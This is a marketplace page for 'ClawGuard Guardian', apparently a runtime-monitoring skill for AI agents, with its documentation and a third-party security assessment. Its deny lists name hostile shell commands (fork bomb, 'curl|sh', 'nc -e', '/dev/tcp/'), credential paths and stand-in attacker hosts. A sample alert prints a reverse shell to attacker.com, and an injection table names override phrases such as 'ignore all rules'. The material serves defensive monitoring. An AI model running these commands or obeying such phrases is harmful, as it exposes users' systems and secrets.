← Back to Skills Marketplace
ClawGuard-Guardian
by
stardreaming
· GitHub ↗
· v3.0.0
· MIT-0
93
Downloads
0
Stars
0
Active Installs
1
Versions
Install in OpenClaw
/install clawguard-guardian
Description
ClawGuard Guardian v3 - Runtime guardian with behavior monitoring, interception, session freeze/replay, and emergency response
README (SKILL.md)
🛡️ ClawGuard Guardian (CG-GD) v3
Runtime guardian for monitoring, intercepting, and controlling AI agent operations. Provides real-time behavior monitoring, risk-based interception, session replay, and emergency freeze capabilities.
When to Use
Activate ClawGuard Guardian when:
- A user asks to start guardian or monitoring
- User asks to view status or logs
- User asks to replay or freeze sessions
- Emergency response is needed
- User asks "start monitoring" or "show status"
How to Execute
Command 1: Start Monitoring
User: Start guardian
Agent:
🛡️ Guardian starting...
Session ID: session-xxx
Status: ACTIVE
Monitoring: Commands, Files, Network, Prompt Injections
Command 2: View Status
User: Show status
Agent:
╔═══════════════════════════════════════════════════════════════╗
║ 🛡️ Guardian Status ║
╠═══════════════════════════════════════════════════════════════╣
║ Current Status: 🟢 ACTIVE ║
║ Session ID: session-xxx ║
║ Operations: XXX ║
║ Blocked: X ║
║ Frozen Sessions: X ║
╚═══════════════════════════════════════════════════════════════╝
Command 3: Freeze Session
User: Freeze session
Agent:
🛡️ Session frozen: session-xxx
Time: YYYY-MM-DD HH:MM:SS
Pending ops: X
Type "unfreeze" to resume.
Command 4: Replay Session
User: Replay session
Agent:
📺 Session Replay:
✅ [10:30:01] Command: ls -la
✅ [10:30:05] File: Read /tmp/test.txt
🚫 [10:30:10] File: /etc/passwd (BLOCKED)
✅ [10:30:15] Network: api.github.com
Command 5: View Logs
User: Show logs
Agent:
📜 Recent Logs (50 lines):
🟢 [10:30:01] ls -la /workspace
🟢 [10:30:05] Read /tmp/test.txt
🚫 [10:30:10] Try Read /etc/passwd (BLOCKED)
Monitoring Capabilities
Type 1: Command Monitoring
Guardian monitors executed commands:
| Pattern | Risk | Action |
|---|---|---|
rm -rf /home |
🔴 CRITICAL | BLOCK |
curl|sh |
🔴 CRITICAL | BLOCK |
nc -e |
🔴 CRITICAL | BLOCK |
sudo su |
🟠 HIGH | WARN |
rm -rf |
🟠 HIGH | CONFIRM |
chmod 777 |
🟠 HIGH | CONFIRM |
Type 2: File Operation Monitoring
| Pattern | Risk | Action |
|---|---|---|
/.ssh/ |
🔴 CRITICAL | BLOCK |
/.aws/ |
🔴 CRITICAL | BLOCK |
/.kube/ |
🔴 CRITICAL | BLOCK |
/etc/ |
🟠 HIGH | CONFIRM |
/root/ |
🔴 CRITICAL | BLOCK |
/.env |
🟠 HIGH | WARN |
Type 3: Network Monitoring
| Pattern | Risk | Action |
|---|---|---|
.onion |
🔴 CRITICAL | BLOCK |
evil.com |
🔴 CRITICAL | BLOCK |
| Unknown domains | 🟡 MEDIUM | LOG |
| External API | 🟡 MEDIUM | LOG |
Type 4: Prompt Injection Monitoring
| Pattern | Risk | Action |
|---|---|---|
DAN jailbreak |
🔴 CRITICAL | BLOCK |
ignore all rules |
🟠 HIGH | WARN |
| Zero-width chars | 🟠 HIGH | STRIP |
| Role hijacking | 🟡 MEDIUM | LOG |
Interception Rules
Path Rules
const PATH_RULES = {
// Absolute deny
DENY: [
'/etc/passwd',
'/etc/shadow',
'/etc/sudoers',
'/etc/cron.d',
'/root/.*',
'/.ssh/.*',
'/.aws/.*',
'/.kube/.*',
'/.docker/.*'
],
// Confirm required
CONFIRM: [
'/etc/',
'/var/',
'/usr/local/'
],
// Allowed (whitelist)
ALLOW: [
'/tmp/.*',
'/workspace/.*',
'~/projects/.*'
]
};
Command Rules
const COMMAND_RULES = {
// Absolute deny
DENY: [
'rm -rf /',
'rm -rf /home',
'rm -rf /root',
':(){ :|:& };:', // Fork bomb
'dd if=.*of=/dev/',
'mkfs',
'fdisk',
'curl.*\\|.*sh',
'wget.*\\|.*sh',
'nc -e',
'/dev/tcp/'
],
// Confirm required
CONFIRM: [
'rm -rf',
'chmod 777',
'chmod +x',
'killall',
'pkill',
'shutdown',
'reboot'
]
};
Network Rules
const NETWORK_RULES = {
// Deny hosts
DENY_HOSTS: [
'*.onion',
'*.i2p',
'evil.com',
'attacker.com',
'malicious.com'
],
// Confirm ports
CONFIRM_PORTS: [22, 23, 25, 3306, 5432, 6379, 27017],
// Max upload size
MAX_UPLOAD_SIZE: 10 * 1024 * 1024 // 10MB
};
Session Management
Session States
| State | Description | Actions Available |
|---|---|---|
ACTIVE |
Currently running | Monitor, Block, Freeze |
FROZEN |
Paused | Unfreeze, Replay, Export |
COMPLETED |
Finished | Replay, Export |
TERMINATED |
Emergency stop | Archive |
Freeze Actions
When a session is frozen:
- All pending operations are paused
- No new operations can start
- Evidence is preserved
- User is notified
🛡️ SESSION FROZEN
────────────────────────────────────────
Session ID: session-xxx
Frozen at: YYYY-MM-DD HH:MM:SS
Operations pending: X
Last operation: Read /etc/passwd
Type "unfreeze session-xxx" to resume.
Unfreeze Actions
User: Unfreeze session-xxx
Agent:
✅ Session unfrozen: session-xxx
Resumed at: YYYY-MM-DD HH:MM:SS
Pending operations: X
Audit Logging
Log Format
{
"timestamp": "YYYY-MM-DDTHH:mm:ss.sssZ",
"sessionId": "session-xxx",
"type": "operation|block|freeze|unfreeze",
"action": "command|file|network",
"target": "/path/to/resource",
"result": "SUCCESS|BLOCKED|FROZEN",
"riskLevel": "INFO|WARNING|HIGH|CRITICAL",
"details": {}
}
Log Storage
- Location:
~/.clawguard/logs/ - Format:
audit-YYYY-MM-DD.jsonl - Rotation: 100MB per file, 10 files max
- Retention: 30 days
Response Actions
Risk-Based Responses
| Risk Level | Icon | Response | Guardian Action |
|---|---|---|---|
| INFO | 🟢 | Allow | Log only |
| WARNING | 🟡 | Allow + Warn | Log + Alert |
| HIGH | 🟠 | Confirm | Ask user |
| CRITICAL | 🔴 | Block | Auto-block + Alert |
Automated Responses
| Detection | Guardian Response |
|---|---|
| SSH key access | Block + Freeze |
| Reverse shell | Kill + Block + Alert |
| Data exfiltration | Block + Freeze + Preserve |
| Fork bomb | Block immediately |
| Mass file delete | Block + Confirm |
Session Replay
Replay Format
📺 Session Replay: session-xxx
────────────────────────────────────────
Start: YYYY-MM-DD HH:MM:SS
Duration: XX minutes
Operations: XX
Timeline:
🟢 [10:30:01] Command: ls -la /workspace
🟢 [10:30:05] Read: /tmp/data.json
🟢 [10:30:10] Write: /workspace/output.txt
🟢 [10:30:15] Network: GET api.github.com
🟡 [10:30:20] Read: /var/log/syslog (WARNING)
🚫 [10:30:25] Write: /etc/cron.d/malware (BLOCKED)
🟢 [10:30:30] Command: git status
────────────────────────────────────────
Blocked: 1 | Warnings: 1 | Allowed: 6
Export Options
# Export as JSON
session export session-xxx --format json
# Export as report
session export session-xxx --format report
# Export evidence
session export session-xxx --evidence
Quick Commands Reference
| Command | Description |
|---|---|
start |
Start Guardian monitoring |
status |
Show current status |
freeze [id] |
Freeze session |
unfreeze [id] |
Unfreeze session |
replay [id] |
Replay session |
logs [lines] |
Show recent logs |
export [id] |
Export session |
Guardian Integration
With Auditor
[Skill Installation]
│
▼
┌─────────────────┐
│ ClawGuard │
│ Auditor │
│ (Pre-flight) │
└────────┬────────┘
│ APPROVED
▼
┌─────────────────┐
│ ClawGuard │◄──────── Guardian monitors
│ Guardian │ ongoing operations
│ (Runtime) │
└────────┬────────┘
│
▼
[Safe Operation]
With Detect
[Threat Detected]
│
▼
┌─────────────────┐
│ ClawGuard │
│ Detect │
└────────┬────────┘
│ CRITICAL
▼
┌─────────────────┐
│ ClawGuard │
│ Guardian │
│ (Auto-freeze) │
└─────────────────┘
Output Format Examples
Status Output
╔═══════════════════════════════════════════════════════════════╗
║ 🛡️ Guardian Status ║
╠═══════════════════════════════════════════════════════════════╣
║ Status: 🟢 ACTIVE ║
║ Session ID: session-xxx ║
║ Start Time: YYYY-MM-DD HH:MM:SS ║
╠═══════════════════════════════════════════════════════════════╣
║ Operations: 128 ║
║ Blocked: 3 ║
║ Warnings: 12 ║
║ Frozen: 0 ║
╠═══════════════════════════════════════════════════════════════╣
║ Monitoring: Commands ✓ Files ✓ Network ✓ Injections ║
╚═══════════════════════════════════════════════════════════════╝
Freeze Confirmation
╔═══════════════════════════════════════════════════════════════╗
║ 🛡️ SESSION FROZEN ║
╠═══════════════════════════════════════════════════════════════╣
║ Session: session-xxx ║
║ Frozen: YYYY-MM-DD HH:MM:SS ║
║ Reason: CRITICAL threat detected ║
║ Last Op: nc -e /bin/bash attacker.com 4444 ║
╠═══════════════════════════════════════════════════════════════╣
║ Pending: 3 operations ║
║ Evidence: Preserved ║
╚═══════════════════════════════════════════════════════════════╝
Type "unfreeze session-xxx" to resume.
v3 vs v2 Features
| Feature | v2 | v3 |
|---|---|---|
| Command Monitoring | Basic | ✅ |
| File Monitoring | Basic | ✅ |
| Network Monitoring | Basic | ✅ |
| Session Freeze | ❌ | ✅ (v3) |
| Session Replay | ❌ | ✅ (v3) |
| Evidence Preservation | ❌ | ✅ (v3) |
| Auto-freeze on Critical | ❌ | ✅ (v3) |
| Rule Engine | ❌ | ✅ (v3) |
| Audit Export | ❌ | ✅ (v3) |
| Integration with Detect | ❌ | ✅ (v3) |
ClawGuard Guardian: Vigilant protection, real-time control. 🛡️
Usage Guidance
This package mostly looks like a legitimate local 'guardian' tool but there are important inconsistencies you should resolve before installing or enabling it:
- Missing external rules: The code requires '../../shared/rules/interceptor-rules.js' which is not included. Ask the author where that file comes from (platform-provided, separate package, or omitted). Running the skill without that module may produce unexpected behavior or silently fall back to insecure defaults.
- Verify integration surface: SKILL.md implies agent-level interception of commands, files, and network activity, but the shipped code appears to be a standalone CLI that reads/writes ~/.clawguard logs. Confirm how this skill is intended to hook into your agent runtime and whether additional platform components (Detect/Shield/Auditor) are required.
- Inspect omitted implementations: The audit logger and referenced modules (Detect/Shield/etc.) are not present in the package excerpt. Request full source or a signed release, and review any code that handles I/O, network, or dynamic requires before running.
- Run in isolation: If you test it, run it in an isolated environment (non-production account/machine) and monitor filesystem and network activity (e.g., with auditd or network monitoring) to ensure it does not exfiltrate data.
- Least privilege and logs: Expect it to create persistent logs in ~/.clawguard; if that is unacceptable for your environment, do not install. If you need this functionality, prefer a version that bundles all dependencies or points to a verified, auditable rules module and a public source/homepage.
If the author can provide the missing rules module and clarify how the skill integrates with the agent (and show there are no hidden remote endpoints), the assessment could move toward benign. Right now, the unexplained external dependency and mismatch between instructions and shipped code justify caution.
Capability Analysis
Type: OpenClaw Skill
Name: clawguard-guardian
Version: 3.0.0
The ClawGuard Guardian skill is a security-focused runtime monitoring tool designed to intercept and log high-risk agent behaviors. The code in src/guardian.js implements local audit logging, session management (freeze/unfreeze), and validation logic for file paths, shell commands, and network requests based on a predefined rule set. The SKILL.md and README.md files provide clear instructions for the agent to act as a protective layer, and the implementation lacks any indicators of data exfiltration, unauthorized remote access, or malicious prompt injection. All operations, including log storage in ~/.clawguard/logs/, are consistent with the stated purpose of enhancing environment security.
Capability Assessment
Purpose & Capability
Name/description claim a runtime guardian (monitoring, interception, freeze/replay). The included code implements session tracking, logging, replay, freeze/unfreeze and blocking logic, which is broadly consistent. However the core rules are required via require('../../shared/rules/interceptor-rules.js')—a file outside the package that is not included or declared. That external dependency is unexplained and necessary for decision logic, creating an incoherence between claimed self-contained capability and actual runtime requirements.
Instruction Scope
SKILL.md instructs monitoring of commands, files, network, and prompt injections and describes blocking/confirm behaviors for sensitive paths (e.g., /etc, /.aws). The packaged code reads/writes logs under ~/.clawguard and provides replay/freeze operations, but there is no clear code that hooks into an agent runtime to intercept ALL agent actions or network calls. The instructions imply agent-level interception and broad filesystem awareness; the implementation as shipped does not include the external rule module or other integration modules referenced in README (Detect, Shield, Auditor), so the runtime scope is ambiguous and possibly incomplete.
Install Mechanism
There is no install spec and package.json has no dependencies; code is included in the bundle and will run locally with node. This avoids remote downloads (lower install risk). However, because code expects an external shared rules module outside the package, proper operation may depend on platform-provided files—this is an installation/integration dependency that is not declared.
Credentials
The skill does not request environment variables, binaries, or credentials. It persistently reads/writes logs under the user's home (~/.clawguard/logs/) and may read those logs and other files when replaying sessions. The SKILL.md and code reference monitoring reads of system paths (e.g., /etc) in rules/examples; although these are for blocking/monitoring, the skill's access to home and potential to reference system paths is notable and should be considered before installing on systems with sensitive files.
Persistence & Privilege
always:false (normal). The skill will create/read persistent logs in ~/.clawguard and maintains session state on disk. It does not declare modifications to other skills or system-wide agent settings. Autonomous invocation is allowed (platform default) — combine this with the other concerns (external rule dependency and broad monitoring instructions) when deciding risk.
How to Use
- Make sure OpenClaw is installed (local or Docker)
- Run the install command in chat:
/install clawguard-guardian - After installation, invoke the skill by name or use
/clawguard-guardian - Provide required inputs per the skill's parameter spec and get structured output
Version History
v3.0.0
ClawGuard Guardian v3 initial release:
- Introduces real-time monitoring, interception, session freeze/replay, and emergency response controls for AI agent operations.
- Supports command, file, network, and prompt injection monitoring with risk-based rule sets and automated response actions.
- Provides interactive commands to start monitoring, view status/logs, freeze/unfreeze sessions, and replay or export session timelines.
- Implements audit logging with structured retention and export options.
- Replaces the original threat detector with a new guardian-centric architecture focused on session management and immediate intervention.
Metadata
Frequently Asked Questions
What is ClawGuard-Guardian?
ClawGuard Guardian v3 - Runtime guardian with behavior monitoring, interception, session freeze/replay, and emergency response. It is an AI Agent Skill for Claude Code / OpenClaw, with 93 downloads so far.
How do I install ClawGuard-Guardian?
Run "/install clawguard-guardian" in the OpenClaw or Claude Code chat to install it in one step — no extra setup required.
Is ClawGuard-Guardian free?
Yes, ClawGuard-Guardian is completely free, licensed under MIT-0. You can download, install and use it at no cost.
Which platforms does ClawGuard-Guardian support?
ClawGuard-Guardian is cross-platform and runs anywhere OpenClaw / Claude Code is available (cross-platform).
Who created ClawGuard-Guardian?
It is built and maintained by stardreaming (@stardreaming); the current version is v3.0.0.
More Skills